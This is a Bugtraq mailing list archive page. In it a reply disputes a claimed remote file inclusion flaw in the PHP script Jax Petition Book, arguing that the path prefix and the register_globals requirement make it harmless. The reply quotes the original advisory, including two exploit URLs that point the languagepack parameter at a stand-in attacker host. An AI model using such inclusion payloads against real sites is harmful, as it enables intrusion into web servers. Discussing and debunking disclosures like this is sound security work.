Bugtraq mailing list archives
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
From: bmatheny () mobocracy net
Date: Mon, 15 Jan 2007 14:13:05 -0800
This is not a vulnerability. Since $languagepack is prefixed by "language/", the PHP stream handler will simply try to open a local file. Also, you can only modify $languagepack if register_globals is on, which, it rarely is these days. Can we stop with the PHP 'vulnerabilities' that aren't? -Blake Whatchu talkin' 'bout, Willis?
------------------------------------------------------------------------------------------------------------------ AYYILDIZ.ORG PreSents... *Script: Jax Petition Book *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip *Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> ------------------------------------------------------------------------------------------------------------------- *Code: require ( "language/" .$languagepack . ".inc.php" ); ------------------------------------------------------------------------------------------------------------------- *Exploit: jax_petitionbook.php?languagepack=http://attacker.txt? smileys.php?languagepack=http://attacker.txt? ------------------------------------------------------------------------------------------------------------------- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci Special Tnx: AYYILDIZ.ORG
-- Blake Matheny bmatheny () mobocracy net http://mobocracy.net
Attachment:
_bin
Description:
Current thread:
- Jax Petition Book (languagepack) Remote File Include Vulnerabilities ilkerkandemir (Jan 15)
- Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities bmatheny (Jan 15)
- Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities John McGuire (Jan 16)
- Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities bmatheny (Jan 15)